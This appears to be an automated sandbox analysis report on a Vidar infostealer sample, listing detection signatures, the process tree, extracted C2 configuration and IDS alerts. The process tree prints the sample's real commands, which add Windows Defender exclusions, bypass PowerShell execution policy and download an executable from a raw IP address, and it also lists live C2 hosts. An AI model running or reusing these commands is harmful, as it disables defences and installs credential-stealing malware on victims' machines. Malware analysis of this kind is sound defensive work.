Edit tour

Windows Analysis Report
installer.bat

Overview

General Information

Sample name:	installer.bat
Analysis ID:	1581177
MD5:	0991e63962884a922fd0e31aabc94bc3
SHA1:	a231220fed04e486db4df6bccd2b7f8214774195
SHA256:	1e1e6ba0072cc59ac0bea0fd4d9ce0ebb888c123e808e15523ad8d6bc75a9b03
Tags:	batVidaruser-lontze7
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Monitors registry run keys for changes

Powershell drops PE file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cacls.exe (PID: 5688 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)

powershell.exe (PID: 3168 cmdline: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6408 cmdline: PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5052 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'" MD5: 04029E121A0CFA5991749937DD22A1D9)

timeout.exe (PID: 3652 cmdline: timeout /t 4 MD5: 100065E21CFBBDE57CBA2838921F84D6)

powershell.exe (PID: 3720 cmdline: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

yoda.exe (PID: 4980 cmdline: yoda.exe MD5: 79884836C406AE143BC31AEADFA81E70)

cmd.exe (PID: 5040 cmdline: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1496 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6020 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5912 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3396 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6364 cmdline: cmd /c md 314782 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 368 cmdline: findstr /V "INSPIRED" Interview MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3656 cmdline: cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Iceland.com (PID: 2800 cmdline: Iceland.com A MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 3560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2316,i,16410334489771861584,14253994741455031161,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 4160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6536 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2368,i,6727333720448355785,14806548561712805577,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2580,i,8334093384874022839,11229385181323441038,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2660 --field-trial-handle=2308,i,4857392273965620054,3048248773784567787,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

choice.exe (PID: 1396 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 3656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 2716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2072,i,3852677470935874424,11790691988476630425,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1980,i,17978194118169702811,13122044973761353622,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6884 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7188 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000003.2446949939.000000000171B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Iceland.com PID: 2800	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Iceland.com PID: 2800	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Iceland.com PID: 2800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.Iceland.com.42f0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
21.2.Iceland.com.42f0000.1.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 6408, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Iceland.com A, ParentImage: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, ParentProcessId: 2800, ParentProcessName: Iceland.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3560, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", CommandLine: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", ProcessId: 3168, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", ProcessId: 3720, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: yoda.exe, ParentImage: C:\Users\user\AppData\Local\Temp\yoda.exe, ParentProcessId: 4980, ParentProcessName: yoda.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ProcessId: 5040, ProcessName: cmd.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", ProcessId: 3720, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe", ProcessId: 3720, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", CommandLine: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force", ProcessId: 3168, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3656, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5040, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3396, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:52.089057+0100	2044247	1	Malware Command and Control Activity Detected	188.245.216.205	443	192.168.2.5	49777	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:54.485441+0100	2051831	1	Malware Command and Control Activity Detected	188.245.216.205	443	192.168.2.5	49783	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:49.751673+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49771	188.245.216.205	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:47.465207+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	49766	188.245.216.205	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:17.710233+0100	1810003	2	Potentially Bad Traffic	5.252.155.64	80	192.168.2.5	49704	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T07:09:17.709947+0100	1810000	1	Potentially Bad Traffic	192.168.2.5	49704	5.252.155.64	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://bijutr.shop/ngs	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/ocaC	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/URR	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49758 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_00406301 FindFirstFileW,FindClose,	11_2_00406301
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0097DC54
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0098A087
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0098A1E2
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_0097E472
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_0098A570
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009866DC FindFirstFileW,FindNextFileW,FindClose,	21_2_009866DC
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0094C622 FindFirstFileExW,	21_2_0094C622
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_009873D4
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00987333 FindFirstFileW,FindClose,	21_2_00987333
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0097D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\314782\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\314782	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 9MB later: 39MB

Networking

Suricata IDS alerts for network traffic

